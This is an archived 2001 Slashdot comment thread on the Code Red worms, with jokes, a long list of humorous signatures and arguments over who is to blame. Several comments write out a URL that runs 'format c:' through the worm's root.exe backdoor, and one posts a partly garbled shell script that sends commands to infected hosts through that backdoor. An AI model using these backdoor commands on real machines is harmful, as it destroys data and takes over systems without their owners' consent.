Code Red III 759
drcrja was the first to send us this brief bit about Code Red III which is apparently faster and more vicious than its entertaining predecessors. I'm still wondering what I should do with the hundreds of IPs in my desktop's apache log trying hopelessly to overflow my buffer.
Why aren't these machines patched yet? (Score:2)
And how can the Koreans as sysadmins be so bad, when Koreans in Age of Empires: The Conquerors are so good ? Maybe the Persians and Turks are being hit badly by Code Red as well ?
Re:Microsoft feature? (Score:2)
MS is not alone in this type of negligence. For far too long, Red Hat Linux installations defaulted to having sendmail run, and had it configured so it would forward e-mail.
Re:Microsoft feature? (Score:2)
I wonder what IIS is considered a dependency for under W2K. Also if Office 2K can install it...
Versions of the worm... (Score:5, Funny)
Code Red: Microsoft Strikes Back
Code Red: Return of the Virii
Code Red: The Not-so Phantom Menace
And finally...
Code Red: Attack of the Clones
Re:Viruses (Score:2)
It's called a sense of humor. Try one out some time. Geez, somebody needs a laxative...
CR written by a linux zealot? (Score:2)
Let's say you read
I've seen the sentiment expressed here before that the only way to drive into the world's consciousness that MS make shoddy products is for a massive vulnerability to hit everyone really badly. For a large number of people to lose data because of a major flaw in an MS product.
Now I see speculation of CR IV (or whatever number version you want to call it) that collects IP addresses of CR II compromised machines from all attempts on its own machine and uses the root script to run "format c:" on each of them. It doesn't exist yet... but will it? I'm sure. Probably even before CRI goes dormant next weekend.
This looks suspiciously like what an unscrupulous
If you're reading this and you're thinking about this is a suggestion, please don't. Lost or corrupt data is a scourge. The tech industry is having enough problems right now as it is without needing to deal with massive data loss. MS's PR so far has been doing an admirable job of damage control, but the last few mainstream articles I've read have stopped referring to it as an Internet problem and started referring to it as an IIS problem. Sufficient damage has already been done to MS. Don't make the situation any worse.
[TMB]
I want Code Red IV myself... (Score:4, Funny)
More information? (Score:5, Interesting)
I've heard all sorts of rumours about this thing. Now whenever I hear people talk about "Code Red III", I give up asking them what it is. It doesn't exist. If it does, it is about time.
The media seems to think that Code Red 1 was July 19, Code Red 2 was Aug 1, Code Red 3 is the one with the back door. In otherwords, they're only figuring out now how bad Code Red II is.
Re:More information? (Score:4, Informative)
CRv2 on the other hand (which is technically the 3rd release, but the first two did almost the same thing) fills up the buffer using X's and then opens the backdoor, sets up root.exe in the scripts/ mapping, etc. Totally different codebase from what I gather.
In all likely hood the media is confused. It wouldn't be the first time. I figure if there's a CRv3 ever out there it won't be near as nice as v2 is. I'm thinking massive damanage upon infection to the machine... but not enough to keep the worm from spreading.
Justin Buist
Re:More information? (Score:5, Funny)
What they are calling CodeRed III is really CodeRedII with a better IP selection routine.
Still has the XXX and installs the backdoor
Now incidents.org is recommending that the compromised machines, which have installed backdoors, format their c drive and reinstall
We can do it for them...
GET
Re:More information? (Score:2)
I don't know if that still works under NT though, fortunately no NT machine available to test it...
Re:More information? (Score:2)
Re:More information? (Score:4, Funny)
We can do it for them...
GET
Okay. So, I'll put up a disclaimer on www.glowingplate.com that any connection attempts by machines infected with Code Red will be met with an HTTP request to $HOSTNAME/script/root.exe?+%2fc+format+c.
Set up Lynx into a little script, log the confirmed kills to my log printer, and all is good legally because of the disclaimer. One would hope.
Re:More information? (Score:5, Informative)
I threw together a script a few nights ago that sends such a popup to every CodeRed2-infected server that's contacted my server. It's available at http://salfter.dyndns.org/codered.shtml [dyndns.org] if anyone's interested. I also have live log info available there...got only about two dozen hits from the original CodeRed, but CodeRed2 is at 3500 hits and climbing.
Since the list is fairly lengthy at this point, let's see if I can sneak the script past the lameness filter:
#!/bin/sh+ %22Your+w\Y ou+have+a+security\h +it.+You+should+fi\s +advantage+of+it.+\s cripts+\(or+wherev\i pts+is+the+default\
http_proxy=
for i in `(echo use apache2 ; echo 'select host.host from transfer inner join\
host on host.id=transfer.hostid where requestid=2058 and transfer.time>"2001-0\
7-31";' ) | mysql | sort | uniq | grep -v ^host\$`
do
echo -n Sending Code Red message to $i...
result=`ping -c 1 -w 3 $i | grep "100% packet loss"`
if [ -n "$result" ]
then
ec ho host is down.
else
ly nx -dump http://$i/scripts/root.exe\?/c+net+send+localhost
eb server+has+been+infected+with+the+CodeRed2+worm.+
+h ole+so+big+that+you+can+drive+a+Mack+truck+throug
x+ it+before+some+script+kiddie+comes+along+and+take
+R emove+root.exe+and+shell.exe+from+c:%5Cinetpub%5C
er +your+CGI+scripts+live,+though+c:%5Cinetpub%5Cscr
+l ocation\).%22 >/dev/null
ec ho message sent.
fi
done
Damn...looks like the lameness filter didn't throttle it, but some extra spaces got thrown in. The spaces that need to be removed are fairly obvious, though.
Re:More information? (Score:3, Informative)
Re:Tested, working... Effective. (Score:2)
Bye bye boot process...
I don't want to make the machine unbootable. I just want to disable Code Red.
-russ
Re:More information? (Score:4, Funny)
Other people keep referring to CodeRed III, or CodeRed3. I *think* they are all talking about CodeRed II. We have yet to verify any fourth version.
For people who are asking in other threads here, CRv1 and CRv2 uses NNNNNNNN's in their URL. CodeRed II uses XXXXXXXXXX's.
Honestly, if we can keep PacMan, Ms. PacMan, PacMan Jr., PacLand, and SuperPacMan distinct, why not the Code Red names?
In any case, if someone is able to translate
this link [mic.go.kr]
That would be a huge help.
I think you're on to something... (Score:5, Informative)
Also Known As: CodeRed.v3, CodeRed.C, CodeRed III, W32.Bady.C
Slashdot Humor (Score:3, Offtopic)
I've been making a list of the best of Slashdot humor. Here it is. In the beginning I did not record the user name:
Lotteries are a tax on people who suck at math.
"He that is wounded in the stones, or hath his privy member cut off, shall not enter into the congregation of the LORD." - Deuteronomy 23:1
The metric system is the tool of the devil!! i get forty rods to the hogshead, and that's the way i likes it!!
Someone had to put all that chaos there! by Greyfox (nride@uswest.net)
I love vegetarians - some of my favorite foods are vegetarians.
"Today's forecast calls for sprinkles of genius with a chance of doom!" - Stewie Griffin
The truth does not set you free, it just makes everyone irritable.
Which is worse: Ignorance or Apathy? Who knows? Who cares?
It's pretty funny, actually. It all started when I thought that inflammable was the opposite of flammable...
From a signature line at the end of every message: [Drink Coke] [Army - Be All You Can Be] [This ad space for sale! Contact the author for current rates]
"You can't have everything. Where would you keep it?" -- Steven Wright
A computer without a Microsoft operating system is like a dog without bricks tied to it's head. dieMSdie (steve@spam-is-bad.xtn.net)
"Science is like sex: sometimes something useful comes out, but that is not the reason we are doing it" -- Richard Feynman
This is a UNIX email virus. It works on the honor system: If you're running a variant of unix , please forward this message to everyone you know and delete a bunch of your files at random. Thank you for your cooperation. by pjl@patsoffice.com
Error: Cannot find file REALITY.SYS - Universe halted, please reboot! (NoSpam_Jonathan_Bayer@bigfoot.com)
It's sad to live in a world where knowing how to program your VCR actually lowers your social status... (rhopkins-at-crosswinds-dot-net)
Disclaimer: The opinions expressed in this post are not necessarily mine, as I've not yet had my medication today. (jmblant@clemson.dontsendmespam.edu)
When I have to develop under Windows, I spend long, frustrating days where mis-handling of a pointer causes BSOD, not a core dump. (Gen-GNU)
"Linux is a beautiful thing, but beauty is in the eye of the beholder, and we're geeks.
Be nice to your friends. If it weren't for them, you'd be a complete stranger. (Yamao)
The white zone is for loading and unloading only by error 404 on Mon Jun 12th, 2000 at 10:30:10 AM EST, kuro5hin
5.72 MOhms across my tongue... should i be concerned? MrResistor (mrresistor@hotmail.com) on Tuesday June 13, @03:38PM EDT (SD)
"Why does everyone always overgeneralize?" by p3d0 on Monday June 05, @12:37PM EDT (SD)
If at first you don't succeed, try a shorter bungee. by leonbrooks on Thursday June 15, @08:10PM EDT
-- Any attempt to brew coffee with a teapot should result in the error code "418 I'm a teapot". The resulting entity body MAY be short and stout. [RFC 2324] by Eric Green (eric@badtux.org) on Thursday June 15, @03:48PM EDT
The Internet interprets advertising as damage and routes around it. by Paul Crowley (slashdot-paul@cluefactory.org.uk)
There are two kinds of people in this world -- Those who divide people into two groups and those who don't. by YogSothoth (jdumas9@z3eh.com (s/[0-9]//g)) on Friday June 16, @08:22PM EDT
The Christian Right is Neither -- by cbuskirk (cbuskirk@yahoo.com) on Friday June 16, @07:35PM EDT
Inertia's what makes the world go 'round. -- by rana on Friday June 16, @07:54PM EDT
If you are angry with someone, you should walk a mile in their shoes... then you'll be a mile away from them, and you'll have their shoes. -- by hobbit (hamish@nutshell.SPAM.freeserve.SPAM.co.uk)
Fruit flies like bananas... Time flies like the wind... by DanBari on Tuesday June 20, @02:19AM EDT
Who is General Failure, and why is he reading my hard drive? mcelrath (mcelrath+slashdotcomment@draal.physics.wisc.edu)
"One World, one Web, one Program" - Microsoft promotional ad "Ein Volk, ein Reich, ein Fuhrer" - Adolf Hitler by Wakko Warner (wakko@qwerty.bitey.net) on Wednesday June 21, @09:25PM EDT
"'Tis some script kidd3z," I muttered, "tapping at my server port-Only this, and nothing more." by Barbarianconanford_please-no@spam-yahoo.com) on Thursday June 29, @07:11PM EDT
The early bird gets the worm, but the second mouse gets the cheese. warpathwarpath@the-cantina.com) on Thursday July 06, @06:13PM EDT
-o-"Warning: You are logged into reality as root..."-o- by Munky_v2email_me@www.dialug.org) on Friday July 07, @09:32AM EDT
There are three types of people in the world; those who can count, and those who can't. -- by Uruks2mdalle@titan.vcu.edu) on Monday July 10, @02:04PM EDT
All generalizations are false. -- by The_Messengerkmfms.com@drew) on Monday July 10, @04:07PM EDT
A theory: Women do not, snore, burp, sweat or fart. Therefore, they must bitch, or they will explode. -- byy m0nkeyb0y on Wednesday July 12, @01:34AM EDT
Why is it that it's a penny for your thoughts, but you have to put your two cents in? Somebody's makin a penny. --Steven Wright
I've lost my faith in nihilism. -- by hey!mattleo@treehouse.acrcorp.com) on Monday July 17, @10:08AM EDT
Being a geek means never having to ask, "Paper or plastic?" -- by Loligoljm@delete_this.fc.net) on Friday July 21, @01:40PM EDT
"Ah yes, the Tomahawk Cruise missle... the rich country's car bomb." -- by Rand Race (helixp@nospam.bellsouth.net) on Friday July 21, @03:29PM EDT
I am hypoallergenic, dermatologist tested, and dishwasher safe... -- by ecliptic_1 (ecliptic_1@spamsux.bigfoot.com) on Friday July 21, @09:49PM EDT
The problems that exist in the world today cannot be solved by the level of thinking that created them. -- Einstein
There is nothing more odious to me than an expensive church. -- by brogdonandrew(at)imagersoft.com) on Tuesday August 01, @02:58PM EDT#106)
"Bill Gates is just a monocle and a Persian Cat away from being one of the bad guys in a James Bond movie." - Dennis Miller
Bad spellers of the world, untie! -- by Fjord_Reddfjord_redd@programmer_dot_net) on Wednesday August 02, @10:43AM EDT#19)
Every night, tired dyslexics around the world look forward to 8 hours of peels. -- by sirinekbillHATESSPAM@sirinek.com) on Wednesday August 09, @12:45PM EDT#124) (User #41507 Info)http://www.sirinek.com
"I do know I'm ready for the job. And, if not, that's just the way it goes." G. W. Bush 8/21/2000
by NecroPuppy on Tuesday August 22, @10:51PM EDT#14) (User #222648 Info) A friend of mine has a barcode on his arm. He rings up as a $.35 pack of JuicyFruit.
Preserve Wildlife -- Pickle a squirrel today! by HydroCarbon10synth903@hotmail.com) on Thursday September 07, @10:48AM NT#23)
You know lately I've been thinking recently about the sig system. I really think that 120 characters seems a bit restr -- by Valar nospamyalusers.kungfoo@linuxstart.com) on Thursday September 07, @11:07AM NT#74) (User #167606 Info)
"Don't anthropomorphize computers. They hate that." -- by poiu on Thursday September 07, @10:50AM NT#124) (User #106484 Info)
5 out of 4 People have problems with fractions. -- by fjordboy noneofyourbeeswax@noneofyourbeeswax.com) on Sunday September 10, @07:16PM EDT#116) (User #169716 Info)http://www.iceball.net
Never miss a good chance to shut up. -- by Aleatoricrsanders@webzone.net) on Monday September 11, @03:15AM EDT#46) (User #10021 Info)
Give me ambiguity or give me something else -- Re:That last ten percent... (Score:2, Informative) by seanmeistersubsynthesis@subdimension.com) on Wednesday September 20, @04:37PM EDT#53) (User #156224 Info)
The music business is a cruel and shallow money trench, a long plastic hallway where thieves and pimps run free and good men die like dogs. There's also a negative side. - Hunter S Thompson
Apocalypse n. Writings from Jewish authors... designed to cheer the hearts of the Jewish people (Webster) -- My password... (Score:1) by MrScience on Friday September 29, @12:06PM EDT#221) (User #126570 Info)"
If at first you don't succeed, it is quite certain you will give up skydiving. -- Maybe it just crashed? (Score:2, Informative) by LilGuy on Wednesday October 04, @04:44PM EDT#54) (User #150110 Info)
I'm a dyslexic agnostic with insomnia... I lie awake at night wondering if there really is a dog! -- Re:Electoral College (Score:1) by Q-Hack!kc5aot_HATES_SPAM_@qsl.net) on Thursday October 19, @09:49AM PDT#23) (User #37846 Info)http://www.qsl.net/~kc5aot
Sponsored by: Chork Lite - Because having an active lifestyle doesn't mean you have to give up jellied meat. -- by Towertwrau.p.dueirml@eo) on Tuesday May 01, @01:03PM EST#60) (User #37395 Info)
I'm in search of myself. If you found me before I arrive, please have me wait. -- by jsse on Wednesday May 02, @09:50PM EST#63) (User #254124 Info)
"Time's fun when you're having flies." - Kermit the Frog -- by joshyboy on Wednesday May 02, @09:31PM EST#17) (User #237516 Info)
...A no smoking section in a resturant is like having a no peeing section in a swimming pool... -- From whats been happing..... (Score:1) by SGDarkKnight on Monday May 07, @11:51AM EST#30) (User #253157 Info)
I'm in search of myself. If you found me before I arrive, please have me wait. -- Very bad case for US (Score:2) by jsse on Thursday May 17, @03:40AM EST#11) (User #254124 Info)
Swearing is the crutch of inarticulate mother fuckers. -- whitehouse.gov. IN CNAME hongkonggov.cn (Score:1) by xodiakbrad AT geeknet DOT net) on Thursday July 19, @03:45PM PDT#15) (User #95699 Info)http://www.pander.org/
If Bill Gates had a nickel for every time Windows crashed...
-
Re:More information? (Score:2)
What the hell is a bigger backdoor?
One's socket after being rampaged with a big stick?
Gee, do I find reporters entertaining when they talk about things they don't know (which is about everything except reporting).
Re:More information? (Score:2)
Marketing (Score:2)
I've always suspected that Code Red was secretly made by Microsoft's Marketing department to convince users to upgrade to the very latest products (and to grab XP as soon as it becomes available). That it's taken three versions to make Code Red work well is the proof!
Perhaps we should reconsider... (Score:3, Interesting)
Thoughts?
Re:Perhaps we should reconsider... (Score:2)
I know the reaction to a suggestion that someone create a worm that "fixes" the effects of the various CR worms provoked a highly negative response
I would have agreed with you, and there was a debate about it in one of the earlier articles, but it seems that @home has no problems with that type of behavior. I found this interesting gem in my server logs last night:
2001-08-09 04:08:11 24.0.0.203 - me.me.me.me 80 GET /c/winnt/system32/cmd.exe /c+VER 404 -
At first I thought it was just another leet script kiddie, tap, tapping at my ports, but the originating address struck me as interesting, so I did a quick nslookup:
Name: authorized-scan1.security.home.net
Address: 24.0.0.203
Authorized Scan?!? By whom?!? I don't recall the TOS mentioning anything about my ISP being authorized should they want to try rooting me...
I calmed down, thinking maybe it was just a one time scan, to see who was infected, but it has since popped up a few more times. And what's more, they certainly don't seem to have been very effective in doing anything, as I'm still being flooded as much as before.
(And yes, I realize this is not the exact same thing described by the parent, but it was similar, and reminded me about it, getting me fired up again.)
-Tommy
Re:Perhaps we should reconsider... (Score:3, Interesting)
I guess part of the problem is you have to install not only the patch, but a service pack, and people who seem to know something about windows think that is hard to do remotely.
Here is another thought: Just write a counter strike that A) deletes code red and the back doors B) turns off IIS and disables it from starting at boot, and C) changes the homepage to something that says "Please install these patches, your system has been infected by Code Red."
This is based on the assumption that 99% of the people who haven't patched their webservers don't use them and have forgotten (or never knew) IIS was installed.
Re:Perhaps we should reconsider... (Score:2)
If I disable someone's web server because they are actively trying to infect my computer with a virus , I am liable for any damages, even ones they make up.
Despite the fact that almost nobody reads, and fewer understand their ISP service agreements, if I put up a "service agreement" on my web server that says "by accessing this web server you agree that you are not infected by the code red virus. If I determine that you are, you agree that I may take any necessary actions to protect my services, including but not limited to automated installation of anti-virus software..." It doesn't count, since I can't have any expectation that someone infected by code red would ever see the agreement.
why doesn't it stop? (Score:2)
I've got a virus on my machine (Score:2, Funny)
None of my antivirus software packages seem to be able to detect it, though
Stop addressing Code Red (Score:4, Insightful)
Re:Stop addressing Code Red (Score:2)
Or more likely it gets installed by default and until CR came along no-one even knew it was there...
Re:Buffer overflow vulnerabilities (Score:2)
How big a distinction does Microsoft draw between "kernel" and "application" anyway? After all they are always on about "integration"...
The Code Red hype Hall of Shame (Score:5, Informative)
Why people love Code Red (Score:2, Insightful)
Microsoft loves it because they get to release patches, and proclaim to the world "we're the good guys, protecting you from those unamerican people who share code!"
The lawmakers get shits and giggles because now they have a reason to pass new, more restrictive laws regarding comminication across "the information superhighway."
The prison system salivates over this sort of stuff. It creates more potential for 15 year old kids to be thrown in prison for essentially victomless crimes. Nothing like young ass for the seasoned prison rapists!
Open source fanatics get another nit to pick with big bad Microsoft. Go free software! No, go open source! No, go free software!
News like this is the best kind around.
Re:Why people love Code Red (Score:2)
Yes, the people who run poorly-patched servers bear some of the blame, but most of the blame still falls on the shoulders of the worm writer. Even if you don't lock the doors to your house, someone who walks in and steals your TV is still guilty of burglary. In the case of Code Red and its successors, the owners of the systems are becoming more and more to blame as time goes by and they don't patch, but does that excuse the worm writer? Not in the least.
As for the 15-year-olds, I never said parents don't have responsibility. I think they do, and I also think a good many of them park their kids in front of a TV or computer, and that's wrong. But I was 15 once, and although that was before the age of the mass-marketed Internet, I knew the difference between right and wrong, and these kids do, too. If one of them breaks into a system and destroys data or defaces a Web site, what do you propose we do with him? Tell him he's been a very bad boy, and say he should never do that again? That might work for the first time and for an extremely minor infraction, but there has to be the threat of some real punishment, or the problem will never end.
Or perhaps we should just lock the 1337 hax0r in a room with the admin of the system he trashed and let it get settled that way. In fairness to a civil society and the health of the kid, the criminal justice system would probably be a better alternative, no?
Re:Why people love Code Red (Score:2)
It's impossible to guard 100% against any kind of break-in. Anyone who thinks they have all the angles covered in deluding themselves. And even if you manage to get a system completely locked down, every new piece of software you install presnets new opportunities for exploits.
Yes, everyone should have backups, but that doesn't make it OK to destroy data. You say a physical break-in is different than an electronic one because there's damage in a physical break-in and not in an electronic one. How is the damage different? Suppose someone was able to hack a computer at your local power company and black out half the state? Backups won't help you there. Suppose someone launches a DoS attack against your ISP for a day, and your Internet access is rendered useless. I've been there before, and it ain't no fun. Suppose someone mailbombs you because they got pissed off with something you said on a newsgroup. I've been through that, too. Even if there's no physical damage, there's damage caused by wasted time and productivity.
You may not want your tax dollars going to fight that. OK, fine, then make the responsible party pay restitution to cover the costs of the investigation. If he's a minor, make his parents pay. If you're worried that he won't have the money to pay, then also worry about the victims of such attacks who don't have the money to bankroll their own investigations.
So hard to keep up (Score:5, Funny)
Tnks.
Use Open Source to Fight Code Red (Score:4, Interesting)
As with the parent, so with the child. (Score:5, Funny)
Version 3? Don't think so. (Score:5, Insightful)
My suspicion is this is Code Red 2. One of the AV companies used "CodeRed.v3" or something similar to refer to Code Red 2, and I'd bet the journalists were just too clueless to figure out that the two names refer to the same thing.
An ETHICAL way to Anti-Virus (Score:5, Interesting)
I've been watching my Apache log as I get hit about every 10 minutes by Code Red. For each source IP address I've been doing a reverse lookup and if successful then notifying the webmaster of the source domain about the infected computer on their network.
I'd like to automate this process and generate a "form" email, filling in the relevant details, but I'm not sure how to cause a script to be invoked by a change in the Apache log, except to maybe run a 5 minute cron job that grabs all the Code Red attacks and then renames the log file.
An example of the email I've been sending is this:
Hi,
Just a note to let you know that a copy of the Code Red virus is on your network attacking my web server. The source IP address is: 207.151.xxx.xxx which a reverse lookup shows as xxx.xxx.gdsl.nwc.net . If this is a customer on your network then please pass on to that individual that they need to reboot their NT/W2K server and possibly reinstall their OS. They will also need to get a patch from Microsoft to correct this vulnerability.
This is probably a very miniscule thing to do, but it does - in a way - inoculate against the virus, at least on consumer DSL networks, and in a manner that is both ethical and - like a virus - fairly contagious. I've heard a lot of buzz in places like Slashdot about making an "anti-virus" but why haven't I heard this kind of thing suggested before?
Re:An ETHICAL way to Anti-Virus (Score:5, Informative)
AddHandler cgi-script
then you can use Perl to write a quick script which will do the reverse lookup and then send that email. Or, if you want to use PHP instead, alter your AddType line for PHP to this:
AddType application/x-httpd-php
Then restart apache, and throw a script named default.ida up to your DocumentRoot directory.
-Chris
Serious blow to open source & free software (Score:5, Funny)
Dynamic Updates (Score:2)
Hehe.
I'm waiting for one which sends digitally-signed updates to hosts (like hybris did off usenet) for upgrade capabilities. From what I understand, CR2 was not directly based on CR1's code (though it's easy enough to disassemble the executable that it sends your web server...)
Obviously,IIS is *vastly* more popular then apache (Score:4, Insightful)
More popular with whom? If there's anything these worms have shown us, it's that there's a HELL of a lot more IIS installations then anybody would really have guessed, due to the ease of installing it without even realizing it with Windows 2000.
IIS and Apache may be roughly comparable for "real" websites, but in terms of sheer number of installations, I'd now bet that IIS is creaming apache.
Before you get too huffy, note this is a bad thing, as it has provided a fertile breeding ground for these worms, while providing little-to-no benefit in return.
"More lusers with vulnerable web servers then ever before - Microsoft Windows 2000."
I saw that Reuters story earlier (Score:4, Interesting)
It's all very vague and the chances of mistaking Code Red rev C as Code Red III, (rev C = version II) are simply too high.
I also assume that this takes advantage of the same Index Vulnerability in IIS, which if anyone has been hit by either of the first two versions then they will have minimised the risks of a new version which uses the same vulnerability.
make some money off banner ads (Score:5, Insightful)
Re:make some money off banner ads (Score:3, Informative)
Won't work. The worm won't follow redirects nor download any pictures (banners) from the page.
Microsoft should be sued (Score:4, Flamebait)
I know gun manufacturers shouldn't be sued when someone commits a crime with a firearm, and in that case the people who created the lame Code Red virii should be sued primarily, but I still think Microsoft is guilty here because their customers weren't aware their Windows-running boxes could start chewing up bandwidth like crazy simply because the OS vendor doesn't give a damn about these things.
To my knowledge, Microsoft didn't even try to mass-mail the patch to their registered customers who might be affected. Therefore, at the very least, I reckon they should be ordered to pay damages to telcos and ISPs for lack of due diligence.
(of course, in Georgia, I'd also be happy to see the state sue them for 59c per second of wasted bandwidth as well :-)
Re:Pirate copies (Score:2)
Re:Microsoft should be sued (Score:2)
THERE WAS a patch AVAILABLE *BEFORE* that virus got mainstream.
Why should microsoft get sued for having stupid users?
It's not like Linux didn't have any opened holes ever. You have to patch your linux? people have to patch their windows. Period. This virus is spreading like flu, not BECAUSE of microsoft, but because of INCOMPETENCE and cluelessness...
I mean, one simple patch, poof! no more problems. Why the heck do I still see my cable modem light flash like hell even after a WEEK that everyone knows about this thing?
See? that's a *&#@*(@& good argument for microsoft to tell the people "don't install non-certified drivers" "don't install non-ms-approved software" "don't do this and that"... people need to be wiped and taken by the hand to be shown what to do. This virus is the greatest proof that the world is full of clueless people and that's why some people won't care if their OS babysits them.
BTW, I don't like the idea of microsoft controlling everything (nor any other companies), I just say this will give them bullets to automate the patching/drivers things without your knowledge (and of course adding a couple of "justified" intrusive programs as well) Tech people always have to pay because of non-tech people, it always been like that... just like we have to pay high insurance rates because people have abused it and gave ammos to the insurance companies to f* us.
I'm so fucking tired of this virus.... where's the big reset switch of the internet?
Re:Microsoft should be sued (Score:2)
This industry as a whole is a castle of sand with the tide rapidly coming in, but nobody cares to admit it.
D
Re:Microsoft should be sued (Score:2, Insightful)
From: Support@iis.microsoft.com
To: Registered_Users@iis.microsoft.com
CC:
Subject: RE: IIS Code Red Worm Patch
Attachment: Instructions.doc
Body:
Hi, how are you?
We are writing you in response to the Code Red worm that has recently attacked our premium enterprise gold standard web portal system, Microsoft Internet Information Server. We have compiled a set of directions for patching the server, and have included these instructionsin a easy to read Word document. If MS Outlook didn't automagically open this attachment for you, double click on the attachment link above.
If you have any advice on this file, please email us back!
See you later!
Re:Microsoft should be sued (Score:3, Insightful)
I'm a gun nut, but even I will say that a maker of a defective gun should be liable. If it explodes in your hand, that's an issue. IIS is exploding in a way, and MS should be liable.
My view is very simple: Things you buy shouldn't suck.
Re:Microsoft should be sued (Score:3, Insightful)
Re:Microsoft should be sued (Score:2)
Microsoft unfortunately has chosen to integrate IIS so tightly with the operating system, that to upgrade one is to upgrade the other.
Some folks are in a real pickle, and don't have the knowledge to get out of it in a short period of time.
Re:Microsoft should be sued (Score:2)
Dosn't really matter how you buy Windows, you arn't going to get even a half decent manual....
It's not like they haven't announced the patch (Score:5, Insightful)
The media talked about it for weeks. Ford sent out letters to customers as far as they could find them. People brought their SUVs in, got new tires put on them, drove out. That's how product recalls usually go.
Software patches aren't all that different. When a hole is discovered, a patch is made. Responsible Microsoft server administrators have the MS site automatically checked on a daily basis for critical updates and patches. Irresponsible admins don't bother, and they become vulnerable and the cause of the worm's spread.
But it would be insane to propose MS should force-feed this server patch to all their customers. The problem isn't the software, it's the admins. You'd be hard-pressed to find a major newspaper in the civilized world that hasn't mentioned this worm yet, and still there are people who don't bother to patch. They're the same ones who think that server software is just like desktop software, where you're the only one who uses it that really matters.
Firestone couldn't make its customers bring their SUVs in to have the tires replaced for free, and there's no way the customers could claim ignorance of the problem after the press got done with it. Likewise, Microsoft can't make its customers upgrade their software for free. They've honestly tried to make all their server customers aware of what's expected of them, but they're as powerless to force it to happen as Firestone is to force car drivers to rotate their tires every 6,000 miles.
Re:It's not like they haven't announced the patch (Score:2)
-Microsoft didn't even update their own webservers completely - windowsupdate and hotmail were both hit by the "Hacked by Chinese" varient, so how do they expect their customers to update? Their response that the customers are at fault is ludicrous in light of this.
-The patches issued by MS are not at all easy to apply. I've talked to people who have Windows 2000 with the latest service pack, go to the update site and are told they have to have an older service pack version to get the patch.
Re:It's not like they haven't announced the patch (Score:2, Informative)
"Ignorance of the law is no excuse", nor is ignorance of your upgrade cycle.
Its Microsoft's responisibilty to do everything they can to notify Win 2000 customers and solve this problem
As I said, they're already doing that. The problem is that too many people don't realize it's a problem they need to attend to. They think they can just install a server, run it, and forget about it.
their design flaw, not the admins. So they need to fix it.
What do you think the patch is for? Even Slashdotters' much-adored Apache software isn't immune to the occasional oversight. The difference is that, as yet, almost everyone who runs Apache is a responsible administrator who already knows the importance of keeping things up-to-date.
I'm not "blaming consumers for the corporation's mistakes," as you say. I'm saying that the corporation is doing everything it can be reasonably expected to, short of directly violating the privacy of every one of its registered customers by forcing a software upgrade down their broadband throats. At some point, you have to lay the blame on the users.
Re:It's not like they haven't announced the patch (Score:2)
Yet.
The US Navy is giving it a good try, though.
not in critical systems. (Score:2)
Re:Microsoft should be sued (Score:5, Insightful)
Re:Microsoft should be sued (Score:5, Insightful)
Claiming that Microsoft should be liable for sysadmins who are some combination of naive, out of touch, unqualified, or just plain stupid is like claiming that I can sue Honda because my parked car was sideswiped by an unlicensed, drunk driver who just happened to be in an Accord.
*: This also applies to NT 4.0.
Re:Microsoft should be sued (Score:2)
I also don't know what the details of how to install IIS on W2KPro are, but I bet it isn't that hard to do "accidentally" -- If nothing else, I can see people just checking everything "just in case" without realizing that that meant that it would run automatically on boot.
Re:Microsoft should be sued (Score:3, Informative)
Re:Microsoft should be sued (Score:2)
The only versions of 2000 that install IIS by default are all server variants. That target market damn well better know what they're getting. That won't include the average user. If they really want a web server, the sticker shock of 2000 Server will send them to Linux.
Re:Microsoft should be sued (Score:3, Insightful)
Certainly, applying the patch is a necessary thing - but when you look at it from a business perspective, which is worse:
1. Apply the patch, have our other server stuff stop working (say, our lovely ASP stuff), and lose money - but save the rest of the internet.
2. Don't apply the patch - we keep making money - and screw everybody else - we will wait.
Suddenly, it all makes sense...
Finally (Score:5, Funny)
Saddens me though (Score:5, Funny)
We seem to have a good ways to go befoer everything that runs on Winblows will also run on Linux
Re: (Score:2)
Re: (Score:2)
Re:Finally (Score:2, Funny)
Put it in another log and forget about it. (Score:4, Interesting)
I'm not even sure how to spell regexe, but this is what I've attempted to do:
Interesting Irony (Score:5, Funny)
Who's calling Whose code "Potentially Viral"?
Re:Bah. (Score:3, Insightful)
And the only thing I saw wrong in that report is that they believed the companies in question when they reported "isolated" problems that have already been fixed.
I've got entire projects sitting dead in the water because one server relies on one piece of third-party software that can't operate with Service Pack 6a, and so can't be brought up until they find a solution.
The pisser is none of MY servers were affected, but I'm still dead in the water because of a bunch of idiots on other teams and projects.
Comment removed (Score:5, Insightful)
Use this tool, you can install Service Pack MAXINT (Score:2)
Encourage the author (Naken) and you'll soon be able to bin VB screen apps as well. Woohoo!
Re:Bah. (Score:4, Informative)
You might be interested in this article [securityfocus.com]titled, "Securing an unpatchable webserver"
Re:Bah. (Score:2)
Whoops, make that 1094 on the first and 580 on the third -- got a couple more as I was entering this.
eEye's Scanner (Score:2)
http://www.eEye.com/Retina [eeye.com]
Legal the same way as ShareSniffer, perhaps? (Score:2)
Essentially, they say that since people enable drive sharing manually, an open share holds the same legality as a clickthrough license: You wouldn't have clicked it if you didn't want to do that, so you're responsible for what happens.
People don't install Windows by mistake. (well, that's another joke entirely) If they have services running that any reasonably competent admin would know about, they're responsible for those.
The point of a server is to let people use it. The point of an internet connection is to make your computer part of a global network. If you're running a server on the internet, you INTEND to have it accessed by anyone who wants to.
The worm's problem is that it's malicious, sucking up unreasonable amounts of bandwidth and denying service to others. If someone wrote a fixit worm that worked as advertised, I don't see how it could run afoul of the law. Just be careful with the bandwidth usage. Someone might call it unauthorized access, which is bullshit, access is implicitly authorized by the machine's very presence on the internet.
IANAL!
Re:Shutting off IIS on an comprimised box... (Score:2)
Most of the infections I've seen are on home PCs with cable modem, and the owner doesn't even know that IIS is active by default. I'd like to find a request that will switch IIS service from automatic to disabled. They'll never notice the difference, and the world will be a better place.
Re:Back Door? Somebody call the Goatse.cx guy! (Score:2, Funny)
Well, suppose we had this giant electronic speculum ;-)
Re:Not SYSTEM-level access.... (Score:2)
More info on Code Red III (Score:4, Funny)
If you see a message on the boards with a subject line of "Hi, how are you," delete it immediately WITHOUT reading it. It is "Code Red III". This is the most dangerous virus yet. It will re-write your hard drive. Not only that, but it will scramble any disks that are even close to your computer (up to 20 feet). It will recalibrate your refrigerator's coolness setting so all your ice cream melts and milk curdles. It will demagnetize the strips on all your credit cards, reprogram your ATM access code,screw up the tracking on your VCR and use subspace fieldharmonic to scratch any CDs you try to play.
